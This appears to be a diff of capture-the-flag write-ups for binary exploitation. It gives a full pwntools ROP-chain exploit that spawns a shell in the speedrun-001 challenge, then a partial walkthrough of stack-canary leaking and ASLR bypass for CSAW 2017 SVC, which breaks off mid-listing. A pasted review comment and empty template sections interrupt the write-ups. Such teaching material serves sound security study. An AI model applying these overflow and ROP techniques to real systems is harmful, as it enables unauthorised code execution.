+ 92 commands loaded for GDB 10.1 using Python engine 3.9
+ Reading symbols from ./speedrun-001...
+ (No debugging symbols found in ./speedrun-001)
+ gef➤ b *0x400bab
+ Breakpoint 1 at 0x400bab
+ gef➤ r
+ Starting program: /home/nothing/binexp/2/speed/speedrun-001
+ Hello brave new challenger
+ Any last words?
+ 13371337
+ This will be the last thing that you say: 13371337
+
+
+ Breakpoint 1, 0x0000000000400bab in ?? ()
+ [ Legend: Modified register | Code | Heap | Stack | String ]
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
+ $rax : 0x34
+ $rbx : 0x0000000000400400 → sub rsp, 0x8
+ $rcx : 0x0
+ $rdx : 0x00000000006bbd30 → 0x0000000000000000
+ $rsp : 0x00007fffffffdad0 → "13371337\n"
+ $rbp : 0x00007fffffffded0 → 0x00007fffffffdef0 → 0x0000000000401900 → push r15
+ $rsi : 0x0
+ $rdi : 0x1
+ $rip : 0x0000000000400bab → nop
+ $r8 : 0x34
+ $r9 : 0x34
+ $r10 : 0xfffffff7
+ $r11 : 0x246
+ $r12 : 0x00000000004019a0 → push rbp
+ $r13 : 0x0
+ $r14 : 0x00000000006b9018 → 0x0000000000443e60 → mov rcx, rsi
+ $r15 : 0x0
+ $eflags: [zero carry parity adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
+ $cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
+ 0x00007fffffffdad0│+0x0000: "13371337\n" ← $rsp
+ 0x00007fffffffdad8│+0x0008: 0x000000000000000a
+ 0x00007fffffffdae0│+0x0010: 0x0000000000000000
+ 0x00007fffffffdae8│+0x0018: 0x0000000000000000
+ 0x00007fffffffdaf0│+0x0020: 0x0000000000000000
+ 0x00007fffffffdaf8│+0x0028: 0x0000000000000000
+ 0x00007fffffffdb00│+0x0030: 0x0000000000000000
+ 0x00007fffffffdb08│+0x0038: 0x0000000000000000
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
+ 0x400b9a lea rdi, [rip+0x919b7] # 0x492558
+ 0x400ba1 mov eax, 0x0
+ 0x400ba6 call 0x40f710
+ ●→ 0x400bab nop
+ 0x400bac leave
+ 0x400bad ret
+ 0x400bae push rbp
+ 0x400baf mov rbp, rsp
+ 0x400bb2 lea rdi, [rip+0x919cd] # 0x492586
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
+ [#0] Id 1, Name: "speedrun-001", stopped 0x400bab in ?? (), reason: BREAKPOINT
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
+ [#0] 0x400bab → nop
+ [#1] 0x400c1d → mov eax, 0x0
+ [#2] 0x4011a9 → mov edi, eax
+ [#3] 0x400a5a → hlt
+ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+ gef➤
+
+
+
+So here we basically used gdb to set the breakpoint at **0x400bab** and then we ran the binary, putting 13371337 as our input text so that it is an easy pattern to find in memory. So before we check for where our pattern is in memory, let's check the memory mappings to see what we have to work with:
+
+
+ gef➤ vmmap
+ [ Legend: Code | Heap | Stack ]
+ Start End Offset Perm Path
+ 0x0000000000400000 0x00000000004b6000 0x0000000000000000 r-x /home/nothing/binexp/2/speed/speedrun-001
+ 0x00000000006b6000 0x00000000006bc000 0x00000000000b6000 rw- /home/nothing/binexp/2/speed/speedrun-001
+ 0x00000000006bc000 0x00000000006e0000 0x0000000000000000 rw- [heap]
+ 0x00007ffff7ff9000 0x00007ffff7ffd000 0x0000000000000000 r-- [vvar]
+ 0x00007ffff7ffd000 0x00007ffff7fff000 0x0000000000000000 r-x [vdso]
+ 0x00007ffffffde000 0x00007ffffffff000 0x0000000000000000 rw- [stack]
+ 0xffffffffff600000 0xffffffffff601000 0x0000000000000000 --x [vsyscall]
+
+
+
+Now here we see the elf memory region between **0x6b6000** and **0x6bc000** because this is from the elf's memory space that does not have PIE, therefore we know what the address is without an infoleak. In addition to that, the permissions are **rw** as you can see on the right, which means that we can read and write to it. Since the space in between the aforementionned memory addresses is only zeroes, we shouldn't mess anything up if we store it here. So let's find the offset between the start of our input where our **13371337** pattern is:
+
+
+ gef➤ search-pattern 13371337
+ [+] Searching '13371337' in memory
+ [+] In '[stack]'(0x7ffffffde000-0x7ffffffff000), permission=rw-
+ 0x7fffffffb46a - 0x7fffffffb476 → "13371337\n\n"
+ 0x7fffffffdad0 - 0x7fffffffdada → "13371337\n"
+
+ gef➤ info frame
+ Stack level 0, frame at 0x7fffffffdee0:
+ rip = 0x400bab; saved rip = 0x400c1d
+ called by frame at 0x7fffffffdf00
+ Arglist at 0x7fffffffdac8, args:
+ Locals at 0x7fffffffdac8, Previous frame's sp is 0x7fffffffdee0
+ Saved registers:
+ rbp at 0x7fffffffded0, rip at 0x7fffffffded8
+
+
+
+Here we see that our input address is at **0x7fffffffdad0** and the return address is at **0x7fffffffded8** , Now let's calculate the offset between the 2 addresses:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/6 ] [blog/binexp/2]
+ → python3
+ Python 3.9.2 (default, Feb 20 2021, 18:40:11)
+ [GCC 10.2.0] on linux
+ Type "help", "copyright", "credits" or "license" for more information.
+ >>> hex( 0x7fffffffdad0 - 0x7fffffffded8 )
+ '-0x408'
+
+
+
+Now we know that have an offset of 0x408 bytes between our input text and the return function. Next step is to find the ROP Gadgets we will use. To do so we will use ROPGadgets.py you can check out how we installed it in the previous tutorial [here](calc.html). Now let's find the gadgets we need for the **rax, rdi, rsi and rdx** registers using the following template:
+
+
+ "pop register ; ret"
+
+
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/speed]
+ → ROPgadget --binary speedrun-001 | grep "pop rax ; ret"
+ 0x0000000000415662 : add ch, al ; pop rax ; ret
+ 0x0000000000415661 : cli ; add ch, al ; pop rax ; ret
+ 0x00000000004a9321 : in al, 0x4c ; pop rax ; retf
+ 0x0000000000415664 : pop rax ; ret
+ 0x000000000048cccb : pop rax ; ret 0x22
+ 0x00000000004a9323 : pop rax ; retf
+ 0x00000000004758a3 : ror byte ptr [rax - 0x7d], 0xc4 ; pop rax ; ret
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/speed]
+ → ROPgadget --binary speedrun-001 | grep "pop rdi ; ret"
+ 0x0000000000423788 : add byte ptr [rax - 0x77], cl ; fsubp st(0) ; pop rdi ; ret
+ 0x000000000042378b : fsubp st(0) ; pop rdi ; ret
+ 0x0000000000400686 : pop rdi ; ret
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/speed]
+ → ROPgadget --binary speedrun-001 | grep "pop rsi ; ret"
+ 0x000000000046759d : add byte ptr [rbp + rcx*4 + 0x35], cl ; pop rsi ; ret
+ 0x000000000048ac68 : cmp byte ptr [rbx + 0x41], bl ; pop rsi ; ret
+ 0x000000000044be39 : pop rdx ; pop rsi ; ret
+ 0x00000000004101f3 : pop rsi ; ret
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/speed]
+ → ROPgadget --binary speedrun-001 | grep "pop rdx ; ret"
+ 0x00000000004a8881 : js 0x4a88fe ; pop rdx ; retf
+ 0x00000000004498b5 : pop rdx ; ret
+ 0x000000000045fe71 : pop rdx ; retf
+
+
+
+So we have found the following gadget addresses for each of our registers:
+
+
+ rax 415664
+ rdi 400686
+ rsi 4101f3
+ rdx 4498b5
+
+
+
+Next we will need a gadget which will write the string **/bin/sh** somewhere in memory, for this we just look through all the gadgets with a mov instruction, we want a rax pointer and the gadget must end with **; ret** :
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/speed]
+ → ROPgadget --binary speedrun-001 | grep "mov" | grep "ptr \[rax\]" | grep "; ret$"
+
+
+
+Looking through for the shortest (and simplest) instructions we find the following:
+
+
+ 0x000000000048d251 : mov qword ptr [rax], rdx ; ret
+
+
+
+This gadget will allow us to write an 8 byte value stored in **rdx** to whatever address is pointed to by the **rax** register. In addition this is convenient becuase we can use the 4 gadgets we found earlier to prepare this write. And lastly we need to find a gadget to actually make the syscall:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/speed]
+ → ROPgadget --binary speedrun-001 | grep "syscall"
+
+ [...]
+
+ 0x000000000040dbdd : sub dword ptr [rsp + 0xf0], eax ; syscall
+ 0x0000000000475453 : sub esp, 8 ; syscall
+ 0x0000000000475452 : sub rsp, 8 ; syscall
+ 0x000000000040129c : syscall
+
+ [...]
+
+
+
+And we have our syscall gadget at 0x40129c. With all of the above, we can finally construct our ROP chain, so we will overwrite the return address with the first gadget of the rop chain, and when it returns it will keep on going down the chain until we get our shell. To move the values into registers, we store the values on the stack inside the ROP chain, and they will be popped off into registers. So we end up with the following exploit:
+
+
+ from pwn import *
+
+ target = process('./speedrun-001')
+
+ # Establish our ROP Gadgets
+ popRax = p64(0x415664)
+ popRdi = p64(0x400686)
+ popRsi = p64(0x4101f3)
+ popRdx = p64(0x4498b5)
+
+ # 0x000000000048d251 : mov qword ptr [rax], rdx ; ret
+ writeGadget = p64(0x48d251)
+
+ # Our syscall gadget
+ syscall = p64(0x40129c)
+
+ '''
+ Here is the assembly equivalent for these blocks
+ write "/bin/sh" to 0x6b6000
+
+ pop rdx, 0x2f62696e2f736800
+ pop rax, 0x6b6000
+ mov qword ptr [rax], rdx
+ '''
+ rop = b""
+ rop += popRdx
+ rop += b"/bin/sh\x00" # The string "/bin/sh" in hex with a null byte at the end
+ rop += popRax
+ rop += p64(0x6b6000)
+ rop += writeGadget
+
+ '''
+ Prepare the four registers with their arguments, and make the syscall
+
+ pop rax, 0x3b
+ pop rdi, 0x6b6000
+ pop rsi, 0x0
+ pop rdx, 0x0
+
+ syscall
+ '''
+
+ rop += popRax
+ rop += p64(0x3b)
+
+ rop += popRdi
+ rop += p64(0x6b6000)
+
+ rop += popRsi
+ rop += p64(0)
+ rop += popRdx
+ rop += p64(0)
+
+ rop += syscall
+
+
+ # Add the padding to the saved return address
+ payload = b"\x00"*0x408 + rop
+
+ print(hexdump(payload))
+
+
+
+Let's run the exploit to see the hexdump of our payload:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/speed]
+ → python3 exploit.py
+ [+] Starting local process './speedrun-001': pid 2115567
+ 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│
+ *
+ 00000400 00 00 00 00 00 00 00 00 b5 98 44 00 00 00 00 00 │····│····│··D·│····│
+ 00000410 2f 62 69 6e 2f 73 68 00 64 56 41 00 00 00 00 00 │/bin│/sh·│dVA·│····│
+ 00000420 00 60 6b 00 00 00 00 00 51 d2 48 00 00 00 00 00 │·`k·│····│Q·H·│····│
+ 00000430 64 56 41 00 00 00 00 00 3b 00 00 00 00 00 00 00 │dVA·│····│;···│····│
+ 00000440 86 06 40 00 00 00 00 00 00 60 6b 00 00 00 00 00 │··@·│····│·`k·│····│
+ 00000450 f3 01 41 00 00 00 00 00 00 00 00 00 00 00 00 00 │··A·│····│····│····│
+ 00000460 b5 98 44 00 00 00 00 00 00 00 00 00 00 00 00 00 │··D·│····│····│····│
+ 00000470 9c 12 40 00 00 00 00 00 │··@·│····│
+ 00000478
+
+
+
+Now that we see our payload is correct, we send it to the binary file with the following 2 lines:
+
+
+ target.sendline(payload)
+ target.interactive()
+
+
+
+Now let's run the exploit to see if everything works as intended:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/speed]
+ → python3 exploit.py
+ [+] Starting local process './speedrun-001': pid 2146710
+ 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│
+ *
+ 00000400 00 00 00 00 00 00 00 00 b5 98 44 00 00 00 00 00 │····│····│··D·│····│
+ 00000410 2f 62 69 6e 2f 73 68 00 64 56 41 00 00 00 00 00 │/bin│/sh·│dVA·│····│
+ 00000420 00 60 6b 00 00 00 00 00 51 d2 48 00 00 00 00 00 │·`k·│····│Q·H·│····│
+ 00000430 64 56 41 00 00 00 00 00 3b 00 00 00 00 00 00 00 │dVA·│····│;···│····│
+ 00000440 86 06 40 00 00 00 00 00 00 60 6b 00 00 00 00 00 │··@·│····│·`k·│····│
+ 00000450 f3 01 41 00 00 00 00 00 00 00 00 00 00 00 00 00 │··A·│····│····│····│
+ 00000460 b5 98 44 00 00 00 00 00 00 00 00 00 00 00 00 00 │··D·│····│····│····│
+ 00000470 9c 12 40 00 00 00 00 00 │··@·│····│
+ 00000478
+ [*] Switching to interactive mode
+ Hello brave new challenger
+ Any last words?
+ This will be the last thing that you say:
+ $ cat flag.txt
+ flag{g0ttem_b0yz}
+ $ id
+ uid=1000(nothing) gid=1000(nothing) groups=1000(nothing),90(network),98(power),972(libvirt),988(storage),990(optical),995(audio),998(wheel)
+ $
+
+
+
+And that's it! We have been able to spawn a shell and print out the flag!
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
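Review bot: the write target 0x6b6000 is justified with "Since the space in between the aforementionned memory addresses is only zeroes, we shouldn't mess anything up", but nothing in the hunk shows the contents of that region; the vmmap line for 0x6b6000-0x6bc000 has Offset 0xb6000 and the binary as Path, i.e. it is the file-backed start of the binary's writable data, not the zero-filled [heap] mapping below it. Add an `x/8gx 0x6b6000` at the breakpoint (or `readelf -S speedrun-001` to show which section starts there) before asserting the write is harmless, since the chain only works here because nothing at that address is used between the write and the `syscall`. In the register table, `rdi: ptr to "bin/sh" #rbx contains the first arguement` names the wrong register in the comment (rdi is the first argument, as the ROP code itself uses) and drops the leading slash of `/bin/sh`. In the exploit's comment block, `pop rdx, 0x2f62696e2f736800` lists the bytes of "/bin/sh\0" in memory order, but the value that actually lands in rdx from `b"/bin/sh\x00"` is the little-endian qword 0x0068732f6e69622f, and the inline comment "The string "/bin/sh" in hex with a null byte at the end" describes a bytes literal, not hex. Smaller points: "offset of 0x408 bytes between our input text and the return function" should read "return address"; "NX which means Non Executable stack enabled" undersells it, since the vmmap shows heap and data are rw- as well, which is exactly why the chain writes a string rather than shellcode; `[](http://ghidra.re/CheatSheet.html)` has empty link text, the Ghidra screenshots that "we see the following:" refers to are absent, and the closing "## Title / text / ` ![]()" sections are unfilled template placeholders.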
diff --git a/2/svc.md b/2/svc.md
new file mode 100644
index 0000000..530570d
--- /dev/null
+++ b/2/svc.md
@@ -0,0 +1,604 @@
+# Csaw 2017 SVC
+
+## Downloading the binary file
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/svc]
+ → wget -q https://github.com/guyinatuxedo/nightmare/raw/master/modules/08-bof_dynamic/csawquals17_svc/svc
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/svc]
+ → wget -q https://github.com/guyinatuxedo/nightmare/raw/master/modules/08-bof_dynamic/csawquals17_svc/core
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/svc]
+ → wget -q https://github.com/guyinatuxedo/nightmare/raw/master/modules/08-bof_dynamic/csawquals17_svc/libc-2.23.so
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/svc]
+ → chmod +x svc ; ls -lash
+ total 7.6M
+ 4.0K drwxr-xr-x 2 nothing nothing 4.0K Mar 6 16:16 .
+ 4.0K drwxr-xr-x 11 nothing nothing 4.0K Mar 6 16:14 ..
+ 5.8M -rw-r--r-- 1 nothing nothing 5.8M Mar 6 16:16 core
+ 1.8M -rw-r--r-- 1 nothing nothing 1.8M Mar 6 16:16 libc-2.23.so
+ 12K -rwxr-xr-x 1 nothing nothing 11K Mar 6 16:16 svc
+
+
+
+` ![]()
+
+## Solution
+
+Now let's check out what the binary does when we execute it after using pwn checksec on it:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/svc]
+ → pwn checksec svc
+ [*] '/home/nothing/binexp/2/svc/svc'
+ Arch: amd64-64-little
+ RELRO: Partial RELRO
+ Stack: Canary found
+ NX: NX enabled
+ PIE: No PIE (0x400000)
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/svc]
+ → ./svc
+ -------------------------
+ [*]SCV GOOD TO GO,SIR....
+ -------------------------
+ 1.FEED SCV....
+ 2.REVIEW THE FOOD....
+ 3.MINE MINERALS....
+ -------------------------
+ >>1
+
+
+So we see that this is a 64bit dynamically linked binary, it has a stack canary and a non executable stack (NX). Basically, the binary asks us if we want to 1) feed the csv with some text input, 2) review what we just put in, or 3 to quit.
+
+
+ -------------------------
+ [*]SCV IS ALWAYS HUNGRY.....
+ -------------------------
+ [*]GIVE HIM SOME FOOD.......
+ -------------------------
+ >>foodfoodfood
+ -------------------------
+ [*]SCV GOOD TO GO,SIR....
+ -------------------------
+ 1.FEED SCV....
+ 2.REVIEW THE FOOD....
+ 3.MINE MINERALS....
+ -------------------------
+ >>2
+ -------------------------
+ [*]REVIEW THE FOOD...........
+ -------------------------
+ [*]PLEASE TREAT HIM WELL.....
+ -------------------------
+ foodfoodfood
+
+ -------------------------
+ [*]SCV GOOD TO GO,SIR....
+ -------------------------
+ 1.FEED SCV....
+ 2.REVIEW THE FOOD....
+ 3.MINE MINERALS....
+ -------------------------
+ >>1
+
+
+
+ -------------------------
+ [*]SCV IS ALWAYS HUNGRY.....
+ -------------------------
+ [*]GIVE HIM SOME FOOD.......
+ -------------------------
+ >>feedfeedfeed
+ -------------------------
+ [*]SCV GOOD TO GO,SIR....
+ -------------------------
+ 1.FEED SCV....
+ 2.REVIEW THE FOOD....
+ 3.MINE MINERALS....
+ -------------------------
+ >>2
+ -------------------------
+ [*]REVIEW THE FOOD...........
+ -------------------------
+ [*]PLEASE TREAT HIM WELL.....
+ -------------------------
+ feedfeedfeed
+
+ -------------------------
+ [*]SCV GOOD TO GO,SIR....
+ -------------------------
+ 1.FEED SCV....
+ 2.REVIEW THE FOOD....
+ 3.MINE MINERALS....
+ -------------------------
+ >>3
+ [*]BYE ~ TIME TO MINE MIENRALS...
+
+
+
+Now that we see how the binary works approximately, let's check it out inside of ghidra:
+
+
+
+Since the main function of the binary is not called 'main' we just search (CTRL+SHIFT+E) in ghidra for one of the keywords that the binary previously gave us like the 'FEED' word and thus we find that the main function is FUN_00400a96, and is quite gigantic so we're going to only focus on the parts we need:
+
+
+ undefined8 FUN_00400a96(void)
+
+ {
+ while (local_c0 != 0) {
+ pbVar1 = std::operator<<((basic_ostream *)std::cout,"-------------------------");
+
+ [...]
+
+ std::operator<<((basic_ostream *)std::cout,">>");
+ std::basic_istream>::operator>>
+ ((basic_istream> *)std::cin,&local;_c4);
+
+ if (local_c4 == 2) {
+ }
+
+ if (local_c4 == 2) {
+ pbVar1 = std::operator<<((basic_ostream *)std::cout,"-------------------------");
+ std::basic_ostream>::operator<<
+ }
+
+ if (local_c4 == 3) {
+
+ }
+
+ [...]
+
+ }
+
+ }
+
+
+
+
+First of all we see that we enter a while loop, and for each iteration of the loop it prompts us for a menu option in local_c4. for the option to scan in data (option 1) we see the following:
+
+
+ if (local_c4 == 1) {
+
+ [...]
+
+ sVar2 = read(0,local_b8,0xf8);
+ local_bc = (undefined4)sVar2;
+ }
+ else {
+ pbVar1 = std::operator<<((basic_ostream *)std::cout,"[*]DO NOT HURT MY SCV....");
+ std::basic_ostream>::operator<<
+ ((basic_ostream> *)pbVar1,
+ std::endl>);
+ }
+
+
+we see that it uses the read() function to scan in **0xf8** bytes of data into the input variable called **local_b8** Now let's set our breakpoint right after the read() call at 0x400cd3:
+
+
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/svc]
+ → gdb ./svc
+ GNU gdb (GDB) 10.1
+ Copyright (C) 2020 Free Software Foundation, Inc.
+ License GPLv3+: GNU GPL version 3 or later
+ This is free software: you are free to change and redistribute it.
+ There is NO WARRANTY, to the extent permitted by law.
+ Type "show copying" and "show warranty" for details.
+ This GDB was configured as "x86_64-pc-linux-gnu".
+ Type "show configuration" for configuration details.
+ For bug reporting instructions, please see:
+ .
+ Find the GDB manual and other documentation resources online at:
+ .
+
+ For help, type "help".
+ Type "apropos word" to search for commands related to "word"...
+ GEF for linux ready, type `gef' to start, `gef config' to configure
+ 92 commands loaded for GDB 10.1 using Python engine 3.9
+ Reading symbols from ./svc...
+ (No debugging symbols found in ./svc)
+ gef➤ b *0x400cd3
+ Breakpoint 1 at 0x400cd3
+ gef➤ r
+ Starting program: /home/nothing/binexp/2/svc/svc
+ -------------------------
+ [*]SCV GOOD TO GO,SIR....
+ -------------------------
+ 1.FEED SCV....
+ 2.REVIEW THE FOOD....
+ 3.MINE MINERALS....
+ -------------------------
+ >>1
+ -------------------------
+ [*]SCV IS ALWAYS HUNGRY.....
+ -------------------------
+ [*]GIVE HIM SOME FOOD.......
+ -------------------------
+ >>13371337
+
+ Breakpoint 1, 0x0000000000400cd3 in ?? ()
+ [ Legend: Modified register | Code | Heap | Stack | String ]
+ ──────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
+ $rax : 0x9
+ $rbx : 0x0000000000400e40 → push r15
+ $rcx : 0x00007ffff7ce0052 → 0x5677fffff0003d48 ("H="?)
+ $rdx : 0xf8
+ $rsp : 0x00007fffffffde80 → 0x00000001f7f96ee0
+ $rbp : 0x00007fffffffdf40 → 0x0000000000000000
+ $rsi : 0x00007fffffffde90 → "13371337\n\t@"
+ $rdi : 0x0
+ $rip : 0x0000000000400cd3 → mov DWORD PTR [rbp-0xb4], eax
+ $r8 : 0x2
+ $r9 : 0x0000000000602000 → 0x0000000000601e18 → 0x0000000000000001
+ $r10 : 0xfffffffffffffb88
+ $r11 : 0x246
+ $r12 : 0x00000000004009a0 → xor ebp, ebp
+ $r13 : 0x0
+ $r14 : 0x0
+ $r15 : 0x0
+ $eflags: [zero CARRY PARITY adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
+ $cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
+ ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
+ 0x00007fffffffde80│+0x0000: 0x00000001f7f96ee0 ← $rsp
+ 0x00007fffffffde88│+0x0008: 0x0000000000000001
+ 0x00007fffffffde90│+0x0010: "13371337\n\t@" ← $rsi
+ 0x00007fffffffde98│+0x0018: 0x000000000040090a → add cl, ch
+ 0x00007fffffffdea0│+0x0020: 0x0000000000602080 → 0x0000000000000000
+ 0x00007fffffffdea8│+0x0028: 0x00007ffff7c2fac6 → <__internal_atexit+70> test rax, rax
+ 0x00007fffffffdeb0│+0x0030: 0x0000000000000001
+ 0x00007fffffffdeb8│+0x0038: 0x00007fffffffdef0 → 0x00007fffffffdf00 → 0x0000000000000002
+ ────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
+ 0x400cc6 mov rsi, rax
+ 0x400cc9 mov edi, 0x0
+ 0x400cce call 0x400900
+ ●→ 0x400cd3 mov DWORD PTR [rbp-0xb4], eax
+ 0x400cd9 jmp 0x400dc0
+ 0x400cde mov esi, 0x400ec8
+ 0x400ce3 mov edi, 0x6021e0
+ 0x400ce8 call 0x400940 <_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc@plt>
+ 0x400ced mov esi, 0x400980
+ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
+ [#0] Id 1, Name: "svc", stopped 0x400cd3 in ?? (), reason: BREAKPOINT
+ ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
+ [#0] 0x400cd3 → mov DWORD PTR [rbp-0xb4], eax
+ [#1] 0x7ffff7c17b25 → __libc_start_main()
+ [#2] 0x4009c9 → hlt
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+ gef➤
+
+
+
+So what we did here is basically to set the breakpoint right after the read() call, then we ran the binary, selected 1 to feed in our data, and gave in the pattern '13371337' Now from here let's find it by using search-pattern:
+
+
+ gef➤ search-pattern 13371337
+ [+] Searching '13371337' in memory
+ [+] In '[stack]'(0x7ffffffde000-0x7ffffffff000), permission=rw-
+ 0x7fffffffde90 - 0x7fffffffde9d → "13371337\n\t@"
+
+ gef➤ info frame
+ Stack level 0, frame at 0x7fffffffdf50:
+ rip = 0x400cd3; saved rip = 0x7ffff7c17b25
+ called by frame at 0x7fffffffe020
+ Arglist at 0x7fffffffde78, args:
+ Locals at 0x7fffffffde78, Previous frame's sp is 0x7fffffffdf50
+ Saved registers:
+ rbp at 0x7fffffffdf40, rip at 0x7fffffffdf48
+
+
+
+Now here we see the memory address of our input at **0x7fffffffde90** and the memory address of the return address at **0x7fffffffdf48** and we calculate the offset as usual:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/1 ] [blog/binexp/2]
+ → python3
+ Python 3.9.2 (default, Feb 20 2021, 18:40:11)
+ [GCC 10.2.0] on linux
+ Type "help", "copyright", "credits" or "license" for more information.
+ >>> hex( 0x7fffffffde90 - 0x7fffffffdf48 )
+ '-0xb8'
+
+
+
+Now we know that there is a 0xb8 offset between our input text and the return address
+
+So let's summarize everything we got so far:
+
+We have a buffer overflow bug that we can use because of a gets() call and we can get to the return address with it. However the first mitigation we will need to overcome is the stack canary. The stack canary is an eight byte random integer (we saw that it was 4 bytes for x86 systems in the previous challenge [feed](feed.html))
+
+However, before the return address is executed, it checks to see if the stack canary has the same value. If it doesn't the program will end. To bypass this, we need to leak the stack canary. That way we can just overwrite the stack canary with itself, so it will pass the stack cnary to check and execute the return address, which we will overwrite with our buffer overflow
+
+We will leak the stack canary thanks to the following **puts()** call that is being used in the second option:
+
+
+ if (local_c4 == 2) {
+
+ [...]
+
+ puts(local_b8);
+ }
+
+
+it is going to print data that it is given by a pointer until it reaches a null byte. With stack canaries the least significant byte is a null byte. SO we will just send enough data to just overflow the LSB of the stack canary, and then print our input. This will print all of our data and the highest seven eight bytes of the stack canary, and since the lowest byte will always be a nullbyte, we know the full stack canary. With this we can just execute the buffer overflow again and write over the stack canary itself in order to defeat this mitigation.
+
+To leak the stack canary we will need to send **0xa9** bytes of data, the first **0xa8** will be to fill up the input char array, and the last byte will be to overwrite the LSB of the stack canary. So let's take a look at the memory in more detail since we know that our input starts at **0x7fffffffde90** :
+
+
+ gef➤ x/24g 0x7fffffffde90
+ 0x7fffffffde90: 0x3733333137333331 0x40090a
+ 0x7fffffffdea0: 0x602080 0x7ffff7c2fac6
+ 0x7fffffffdeb0: 0x1 0x7fffffffdef0
+ 0x7fffffffdec0: 0x601df8 0x7fffffffe048
+ 0x7fffffffded0: 0x7fffffffe038 0x400e1b
+ 0x7fffffffdee0: 0x11bf 0x10000ffff
+ 0x7fffffffdef0: 0x7fffffffdf00 0x400e31
+ 0x7fffffffdf00: 0x2 0x400e8d
+ 0x7fffffffdf10: 0x0 0x400e40
+ 0x7fffffffdf20: 0x0 0x4009a0
+ 0x7fffffffdf30: 0x7fffffffe030 0x6a77910e1ec4300
+ 0x7fffffffdf40: 0x0 0x7ffff7c17b25
+
+
+
+Here we see that our payload begins at 0x7fffffffde90 since there are only 1s 3s and 7s, although i'm not sure as to what it has been formatted to, we see that **0xa8** bytes down the stack the stack canary **0x6a77910e1ec4300** at **0x7fffffffdf38**
+
+The next step is to defeat the ASLR. ASLR is a mitigation that randomizes the addresses sections of memory. This way when we run the program, we don't actually know where various things in memory are. While the addresses are randomized, the spacing between things are not. For instance the libc (where all the standard functions lik eputs, printf, fgets are stored most of the time) the address of **puts** and **system** will be different everytime we run the program. However the offset between them will remain the same. SO if we leak the address of **puts** we will also leak the address of **system** if we know the offset between the 2. This will allow us to break ASLR in the region where we know one memory and the offset to the next. So let's take a look at the vmmap inside of gdb while we run the binary:
+
+
+ gef➤ vmmap
+ [ Legend: Code | Heap | Stack ]
+ Start End Offset Perm Path
+ 0x0000000000400000 0x0000000000402000 0x0000000000000000 r-x /home/nothing/binexp/2/svc/svc
+ 0x0000000000601000 0x0000000000602000 0x0000000000001000 r-- /home/nothing/binexp/2/svc/svc
+ 0x0000000000602000 0x0000000000603000 0x0000000000002000 rw- /home/nothing/binexp/2/svc/svc
+ 0x0000000000603000 0x0000000000624000 0x0000000000000000 rw- [heap]
+ 0x00007ffff7a8d000 0x00007ffff7a91000 0x0000000000000000 rw-
+ 0x00007ffff7a91000 0x00007ffff7a94000 0x0000000000000000 r-- /usr/lib/libgcc_s.so.1
+ 0x00007ffff7a94000 0x00007ffff7aa5000 0x0000000000003000 r-x /usr/lib/libgcc_s.so.1
+ 0x00007ffff7aa5000 0x00007ffff7aa9000 0x0000000000014000 r-- /usr/lib/libgcc_s.so.1
+ 0x00007ffff7aa9000 0x00007ffff7aaa000 0x0000000000017000 r-- /usr/lib/libgcc_s.so.1
+ 0x00007ffff7aaa000 0x00007ffff7aab000 0x0000000000018000 rw- /usr/lib/libgcc_s.so.1
+ 0x00007ffff7aab000 0x00007ffff7aba000 0x0000000000000000 r-- /usr/lib/libm-2.33.so
+ 0x00007ffff7aba000 0x00007ffff7b55000 0x000000000000f000 r-x /usr/lib/libm-2.33.so
+ 0x00007ffff7b55000 0x00007ffff7bed000 0x00000000000aa000 r-- /usr/lib/libm-2.33.so
+ 0x00007ffff7bed000 0x00007ffff7bee000 0x0000000000142000 --- /usr/lib/libm-2.33.so
+ 0x00007ffff7bee000 0x00007ffff7bef000 0x0000000000142000 r-- /usr/lib/libm-2.33.so
+
+ 0x00007ffff7bef000 0x00007ffff7bf0000 0x0000000000143000 rw- /usr/lib/libm-2.33.so
+ 0x00007ffff7bf0000 0x00007ffff7c16000 0x0000000000000000 r-- /usr/lib/libc-2.33.so
